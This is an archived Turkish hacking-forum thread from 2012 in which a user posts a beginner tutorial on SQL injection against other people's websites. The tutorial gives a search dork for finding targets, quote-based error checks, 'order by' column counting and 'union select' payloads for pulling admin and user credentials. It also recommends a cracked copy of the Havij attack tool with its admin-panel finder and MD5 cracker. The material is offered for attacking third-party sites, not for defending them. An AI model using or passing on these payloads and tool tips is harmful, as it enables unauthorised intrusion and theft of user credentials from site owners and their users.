WwW.HacKbanK.Gen.TR (ArÅŸiv Ana sayfa) => HacK, Hacker ve Güvenlik Açıkları

Konu: Sql Ä°njection

Sayfa: [ 1 ]

ReFiLtMaN 27.01.2012 23:35:54
1-) Ä°lk Once Bu Hack Ä°ÅŸlerinde BasarıLı oLmak Ä°stiyorsanız Program Vs. AramamaLısınız . Bir Program Bir Siteye GeneLde Hic Bir Sey Yapamaz ( Ben  Yapabilen Program Gormedim .)

2-)Yeni Baslıyorsanız Ä°lk Olarak Sql Ä°njection Oneririm  .

SqL Ä°njection .

Sql Nedir ?

Ä°lk Once Kolon Sayısı Bulup Tablo Ä°simLerinden  userLerin Ve Adminin Id Sifre Mail Vs. BilgiLerine ULasmayı Saglayan Bir Acık Turudur Basittir Aslında Mantıgı Cozunce .

BaslayaLım .

 Dorkumuz : index.php?id=1


         
www.hedefsite.com/index.php?id=1
   Bu Sitede Sql Ä°njection Acıgı Olup Olmadıgını Ogrenmek İçin Sonuna 'a Yazarız . Eger Hata Verirse Sql injection Vardır Hata Vermezse Ugrasmayın .


         
www.hedefsite.com/index.php?id=1
    Colon Sayısını Bulmak İçin Sonuna +order+by+Sayı  Ekliyoruz .


         
www.hedefsite.com/index.php?id=1+order+by+3
   Hata Vermedi

         
www.hedefsite.com/index.php?id=1+order+by+4
   Hata Vermedi

         
www.hedefsite.com/index.php?id=1+order+by+5
   Hata Verdi

Colon Sayımız 4 Diyoruz .

Bilgileri Çekmek İçin Union+select  Komutunu Kullanıyoruz .Kolon Sayımız 4 dü Union+select+1,2,3,4


         
www.hedefsite.com/index.php?id=
-1+Union+select+1,2,3,4

Diyerek BilgiLeri Çkeriz .


Program Sorarsanız :
Havij Programının FuLunu Oneririm  . Hem Admin Paneli Bulucusu Md5 Kırıcısı Vardır  Ve Sql Yaparsınız Kullanımı  Çok Basittir .
Havij Le Nasıl Sql Yapıldıgını Youtube De Araştırıp Bulabilirsiniz Cok Fazla Sayıda Video Mevcut .

( Havijde Koda Gerek Kalmaz Kendi Ypar Ve Size Bilgileri Verir Cok Basittir )

MuratbanK 30.01.2012 03:16:43
İlk konu için gayet güzel bir açılış olmuş. Bilgiler için teşekkürler...


Sayfa: [ 1 ]